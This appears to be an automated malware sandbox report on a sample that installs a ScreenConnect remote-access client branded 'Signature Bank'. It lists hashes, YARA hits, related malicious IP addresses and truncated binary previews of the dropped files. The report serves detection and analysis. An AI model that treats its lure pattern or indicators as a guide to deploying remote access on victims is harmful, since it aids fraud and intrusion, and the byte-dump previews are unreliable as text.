                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target lat0Kwfbuj.exe, PID 5880 because it is empty
                                            • Execution Graph export aborted for target rundll32.exe, PID 2620 because it is empty
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                            • VT rate limit hit for: lat0Kwfbuj.exe
                                            No simulations
                                            No context
                                            No context
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            NASSIST-ASGIJosho.m68k.elfGet hashmaliciousUnknownBrowse
                                            • 95.164.4.65
                                            J5uGzpvcAa.elfGet hashmaliciousUnknownBrowse
                                            • 95.164.4.65
                                            nPRmTlXhOT.elfGet hashmaliciousUnknownBrowse
                                            • 95.164.4.65
                                            OwBugJ5CiC.elfGet hashmaliciousUnknownBrowse
                                            • 95.164.4.65
                                            H5LPetzgXV.elfGet hashmaliciousUnknownBrowse
                                            • 95.164.4.65
                                            4l9YKCc7qQ.elfGet hashmaliciousUnknownBrowse
                                            • 95.164.4.65
                                            mCR2IJsjgy.elfGet hashmaliciousUnknownBrowse
                                            • 95.164.4.65
                                            Josho.arm7.elfGet hashmaliciousMiraiBrowse
                                            • 95.164.4.65
                                            J3m5xLlT8D.exeGet hashmaliciousDCRatBrowse
                                            • 95.164.6.175
                                            na.elfGet hashmaliciousUnknownBrowse
                                            • 94.131.118.154
                                            No context
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dllLatest version 4.7.exeGet hashmaliciousScreenConnect ToolBrowse
                                              Latest version 4.7.exeGet hashmaliciousScreenConnect ToolBrowse
                                                INSPECAO-B01S.msiGet hashmaliciousScreenConnect ToolBrowse
                                                  1.exeGet hashmaliciousScreenConnect ToolBrowse
                                                    1.exeGet hashmaliciousScreenConnect ToolBrowse
                                                      5iT2ITz44g.exeGet hashmaliciousScreenConnect ToolBrowse
                                                        5iT2ITz44g.exeGet hashmaliciousScreenConnect ToolBrowse
                                                          E-receipt-67.exeGet hashmaliciousScreenConnect ToolBrowse
                                                            E-receipt-67.exeGet hashmaliciousScreenConnect ToolBrowse
                                                              statment.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):219562
                                                                Entropy (8bit):6.5819256907117225
                                                                Encrypted:false
                                                                SSDEEP:3072:X09LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG4:X0uH2aCGw1ST1wQLdqv4
                                                                MD5:8F82F7597826296AE06CA611F9EB7B85
                                                                SHA1:70E6B93152921577345C8E56E907FD997DE8DB4E
                                                                SHA-256:C2E3AB81282AF899E0CDBB8F4B13FE29DB4B8EC7FC5C711BDA1B62708A67D343
                                                                SHA-512:5D0B76C149C1C5996FC52D5A535B2C9B8313565AB1C75C936DA871A9684B72A068A3F82A5C3700130C74526B934ED9ED61B00E2BADF56431BFB3F62E2B10EA34
                                                                Malicious:false
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\48861a.rbs, Author: Joe Security
                                                                Reputation:low
                                                                Preview:...@IXOS.@.....@.elY.@.....@.....@.....@.....@.....@......&.{C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}'.ScreenConnect Client (20ae101cef0f1acf)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (20ae101cef0f1acf)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{02BB93AF-5D7F-2FA3-2CF1-9B67E8FF130E}&.{C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}.@......&.{CD7C3ECA-C9AF-5145-BA7A-4A372EAC7AA5}&.{C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}.@......&.{C0E56857-1338-1BBE-56C3-EE29B4292C6F}&.{C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}.@......&.{6E5988BE-3FE4-2081-9090-28726FA53B07}&.{C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}.@......&.{AAFCFDA6-3A31-9AA2-04B7-C6C55684F80B}&.{C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}.@......&.{7BEC3624-40B7-0ABF-4C6B-0093902CAEA0}&.{C1B3422C-ACE2-80E9-5511-BBBA7971CBA6}.@....
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):241
                                                                Entropy (8bit):4.920230500734458
                                                                Encrypted:false
                                                                SSDEEP:6:8kVXdyrKDLIP12MUAvvR+ojlX2KG6cAtsiMI4CAcO:rHy2DLI4MWoj12K9cAuiMI4L
                                                                MD5:E412586907C81C15CED17A120DE270B3
                                                                SHA1:EE0E2EDE15DAD65285184C2044367CC6D20D8709
                                                                SHA-256:0F0E577CD0071C73AFB57530C67C5C79E3A0695FBA617ED5531B882AAB0531EB
                                                                SHA-512:CFB7699A72B393B06B89C197F378EBC31650E0D9B96966F1464BA79E6EF92B6EE9D951D588E47250E9A523869E0E9FDE592E237168B429F430C1A11EE2F8045B
                                                                Malicious:false
                                                                Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..n_........ A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.......Signature Bank
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):49959
                                                                Entropy (8bit):4.758252520953682
                                                                Encrypted:false
                                                                SSDEEP:1536:sdr6QF+gQpAfqiErOmOCqZUWi+JgJ0FQi9zwHLAhDKZ1HtRKekmrg9:sdr1F+gQOlErOmPqZUWi+JgJ0FQi9zw2
                                                                MD5:511202ED0BA32D7F09EAB394C917D067
                                                                SHA1:DBD611720FD1730198F72DEC09E8E23E6D6488F8
                                                                SHA-256:F8398A235B29AF6569F2B116E0299B95512D042F5A4CD38C98C79729A5FBDB9D
                                                                SHA-512:F04B08938F3EBF8CFA1A1157A94DA3AE4699494BDCE566619AFA5B13A8F6EBE556D522C064E5EA02E343B59A489343F77E3EA2BB2EA390AAE35A626F41CADC77
                                                                Malicious:false
                                                                Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):26722
                                                                Entropy (8bit):7.7401940386372345
                                                                Encrypted:false
                                                                SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                Malicious:false
                                                                Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):197120
                                                                Entropy (8bit):6.595800276062395
                                                                Encrypted:false
                                                                SSDEEP:3072:TS77Zz8NtrNOuJTaFs2VUXEWcyzvXqu5zDvJXYt:E7OrJOuJE4Xawqu5G
                                                                MD5:F311A8217807F6C85817058522E234A2
                                                                SHA1:CEB586B3CF7B0EE86EA8242D9B3D8641C9444CD1
                                                                SHA-256:032450CD037D9E0EEC49E0B4FF44073D539775633FB4AF6FD76D4CB19116AAC9
                                                                SHA-512:5EF1F6B595AF9CC7F788680AC3F3E9B8B12BAAFE734A8E2F675BAA57F5EF2C69806492911BDA54F11C5A4B8CF3CCED82CFC6E0ECF214E45083E9F9AA6A83D039
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                • Filename: Latest version 4.7.exe, Detection: malicious, Browse
                                                                • Filename: Latest version 4.7.exe, Detection: malicious, Browse
                                                                • Filename: INSPECAO-B01S.msi, Detection: malicious, Browse
                                                                • Filename: 1.exe, Detection: malicious, Browse
                                                                • Filename: 1.exe, Detection: malicious, Browse
                                                                • Filename: 5iT2ITz44g.exe, Detection: malicious, Browse
                                                                • Filename: 5iT2ITz44g.exe, Detection: malicious, Browse
                                                                • Filename: E-receipt-67.exe, Detection: malicious, Browse
                                                                • Filename: E-receipt-67.exe, Detection: malicious, Browse
                                                                • Filename: statment.exe, Detection: malicious, Browse
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k%..........." ..0.............*.... ... ....... .......................`.......L....@.....................................O.... ..|....................@......4...8............................................ ............... ..H............text...P.... ...................... ..`.rsrc...|.... ......................@..@.reloc.......@......................@..B........................H.......................^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~'...%-.&~&.....y...s....%.'...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.%...($....5..............s%....=...*..0...........~)...%-.&~(.....|...s&...%.)...(...+..~*...%-.&~(.....}...s(...%.*...(...+.r9..
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):68096
                                                                Entropy (8bit):6.081952570081618
                                                                Encrypted:false
                                                                SSDEEP:1536:XxgIAw8rVbpcgOswatz8Bn2yRIZMmQ9VIlxnBVb8ER:Xw31b4f0Q9VAnNR
                                                                MD5:3FF07C657068430EF677181D1F67066D
                                                                SHA1:37F7E9D2CCB65B4EA2733393015635EA1B43393E
                                                                SHA-256:D17CF13612039F6A4CA17B56C32399CCBE279A499C8D2F8E910B1FD6F4FFF2B1
                                                                SHA-512:5552208B5649CEAC2B32510EA12D409A85643D27E6A9C335E049195A507AE9211AEE77574376FDE059747998B60AE041E191635A67C3461585ABA7F9B877B095
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C............." ..0..............!... ...@....... ....................................@.................................-!..O....@.......................`....... ..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................a!......H.......Po....................... ........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....j...s....%.,...(...+*vs....%.}Q.........s....(....*....0...........s....}.....s....}...........}.......('.....}.....(....&.(*..........s....o.....(*...~-...%-.&~+.....k...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s>...}....... ..6........s....s>...}.....((...($............o%........
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):95520
                                                                Entropy (8bit):6.505417048098125
                                                                Encrypted:false
                                                                SSDEEP:1536:jg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgIU0HMm7/xK:MhbNDxZGXfdHrX7rAc6myJkgIU0HVY
                                                                MD5:826314610D9E854477B08666330940B5
                                                                SHA1:65B601D60042CF6F263CD38AC2F63CD06A9DE159
                                                                SHA-256:E54963CB63C9E471E2D3D59E55E4C7AEEDCCAFDD616B99C4B3AF230608E4BCC9
                                                                SHA-512:5C01D6DE25D60EB6B1EB72B7FA6401B71153C2A740C41AEEB2BD302CC4E80F5C1A388B647EE16DA196705AC8EDBC60ABDA49B9A531517BB85959CC018FB5D1FB
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................-.....@.................................p...x....`..P............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):546304
                                                                Entropy (8bit):6.03286879586464
                                                                Encrypted:false
                                                                SSDEEP:6144:hAUz5UEsIXxk3QCLKSkGEexE77VcYbUinCLrDfElYzMsdqe1J6tMznSAiOUfw8qg:hK67tEshnkDfyt9MznZd8PTIP8
                                                                MD5:3B1BA4BEBEFDC8A95B0F2F0B4E50C527
                                                                SHA1:15551D2E8BFB829F3A96D161B43DE820C0D417CE
                                                                SHA-256:A843B3A4549C43EF5BD8470CACF5D2F0F3B3C8110441FCC10079FACC7DB3DE29
                                                                SHA-512:F41595586CD5330537F5F02B392310B028E36F618E2583D125430ECD103EBBF6D2CF6BEFCFB1B32279EEB9FD7EF018F49131E3906FB61BC324DA85D93A9A18C7
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..N...........i... ........... ....................................@..................................h..O.......t...........................<h..8............................................ ............... ..H............text...@M... ...N.................. ..`.rsrc...t............P..............@..@.reloc...............T..............@..B.................i......H........@...&...................g........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1721344
                                                                Entropy (8bit):6.638160977312247
                                                                Encrypted:false
                                                                SSDEEP:24576:jQNtbLFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTs5:jebLJkGYYpT0+TFiH7efP
                                                                MD5:D196174CF03F86C8776E717F07D5D19F
                                                                SHA1:BBD2C6A59229B3E4EC7C5742248F3F55A61DD216
                                                                SHA-256:A1EDD67A131505CC84D76601474C53874A56B5437B835838E4A866E20F6CD264
                                                                SHA-512:CF4D159BCB42A1A7EA03F8877736CACE109AE79998906B9178C74F7A9B63030CDDC2BC94EF6C5F718E99C2D0039CF3589F8C4F2BF5B67DB94B3B96D2C988B45B
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....A............" ..0..<..........Z[... ...`....... ....................................@..................................[..O....`..|...........................dZ..8............................................ ............... ..H............text...h;... ...<.................. ..`.rsrc...|....`.......>..............@..@.reloc...............B..............@..B................;[......H.......,...................0....Y........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):260168
                                                                Entropy (8bit):6.416438906122177
                                                                Encrypted:false
                                                                SSDEEP:3072:qJvChyA4m2zNGvxDd6Q6dtaVNVrlaHpFahvJ9ERnWtMG8Ff2lt9Bgcld5aaYxg:0IvxDdL6d8VNdlC3g0RCXh5D
                                                                MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                                                SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                                                SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                                                SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A........................T....................V.......V.......V......................=U......=U......=U$.....=U......Rich....................PE..d.....Qf.........." ...'.^...^.......................................................(....`..........................................e.......f..P................ ......HP..........P%..p............................$..@............p...............................text...t].......^.................. ..`.rdata.......p.......b..............@..@.data....+...........d..............@....pdata... ......."...x..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):61216
                                                                Entropy (8bit):6.316664164724877
                                                                Encrypted:false
                                                                SSDEEP:1536:9Ai+zmNzdj8bv8DtYQ4RE+TC34/ibdt7Xx56:9UzmNDYQbEQta
                                                                MD5:C1F206B0C0058DC4CC7B9F3125F61E20
                                                                SHA1:541A1564799DA24C48BE188888F306381EF23728
                                                                SHA-256:94E711FD79FC81084FB222FF927893669DDBA9890C6622DD4981FB5766438A63
                                                                SHA-512:6163A255DAF2DC9EC14391F31CA09A466B7B33662F2215B9941ADD59B46CD1177E9240D2B1C42E41EA0AC9AE2EFA03F6A2D3E80497D32F6E505B813ED66DA2AD
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c.8..........."...0.............*.... ........@.. ....................... ............@.....................................O....... ............... )..............8............................................ ............... ..H............text...0.... ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H........S...............................................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s ...(!...s....("...*..0...........(#.....($.....(%....s....%.o&...%.o'...%.o(...%s!...o)...%~....o*...}......(....o+...o,....(-.....@...%..(.....o.....s/...}.....{...........s0...o1....s...
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):266
                                                                Entropy (8bit):4.842791478883622
                                                                Encrypted:false
                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                Malicious:false
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):598816
                                                                Entropy (8bit):6.182826342545805
                                                                Encrypted:false
                                                                SSDEEP:6144:0ya9pDzjhf+YMojz3cZRzyyUs0Ny2rOfQyEAlVw72191BVi1NnfEQcYF2/R4IrNC:jajDzNZFjLcZRzyyh5/EA3wv1lSYGXk
                                                                MD5:AB5FA8D90645878D587F386D0E276C02
                                                                SHA1:A602A20735A1104851F293965F1FE4AB678BF627
                                                                SHA-256:316BBF433F1F803D113ADF060C528CCC636656CEE26B90F5FEA011C1C73C7D16
                                                                SHA-512:A181E23C8FA01BC1D9F0F9F95A5CA6112E2B61F34F4C1DA696D3CCABBBD942BCC81A3F4A60921328A6020D28AED8711C22BE33761CB685921D50FEA8B1D7B986
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....]..........."...0.............".... ... ....@.. .......................`......0.....@.....................................O.... .................. )...@......$...8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......LC..X.............................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):266
                                                                Entropy (8bit):4.842791478883622
                                                                Encrypted:false
                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                Malicious:true
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):842248
                                                                Entropy (8bit):6.268561504485627
                                                                Encrypted:false
                                                                SSDEEP:12288:q9vy8YABMuiAoPyEIrJs7jBjaau+EAaMVtw:P8Y4MuiAoPyZrJ8jrvDVtw
                                                                MD5:BE74AB7A848A2450A06DE33D3026F59E
                                                                SHA1:21568DCB44DF019F9FAF049D6676A829323C601E
                                                                SHA-256:7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
                                                                SHA-512:2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}....}H..}H..}H.d~I..}H.dxIG.}H.dyI..}H..xI..}H..yI..}H..~I..}H..|H8.}H..}H..}H2.}I..}H2..I..}HRich..}H........PE..d.....Gf.........." ...'.P...........H....................................... ......q.....`......................................... ...t....................P...y.......(......,4.....T.......................(.......@............`...............................text....O.......P.................. ..`.rdata...z...`...|...T..............@..@.data....d.......0..................@....pdata...y...P...z..................@..@_RDATA...............z..............@..@.reloc..,4.......6...|..............@..B................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):81696
                                                                Entropy (8bit):5.861320173003981
                                                                Encrypted:false
                                                                SSDEEP:1536:QtyCl44uzbexI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7AB7gxv:78BxukLdEBY
                                                                MD5:2C158A30F7274E1931860E434DE808A2
                                                                SHA1:F649A56C9A598117D68CC6999627A937305DB6C7
                                                                SHA-256:B623E67BEA356C1793F3C921C5838719ED8B879EFCD966E97EE753498B1618B5
                                                                SHA-512:14BD481BF183CACAE210EB06AFF04870C6D53D3E7F095EA7F96A7EA227167E6A38EB20C9EDE9F36BF23D02C36182A463239B3A835D0BD28E8666C378F76FE64D
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....)............"...0..@...........^... ...`....@.. .......................`...... .....@..................................^..O....`.................. )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
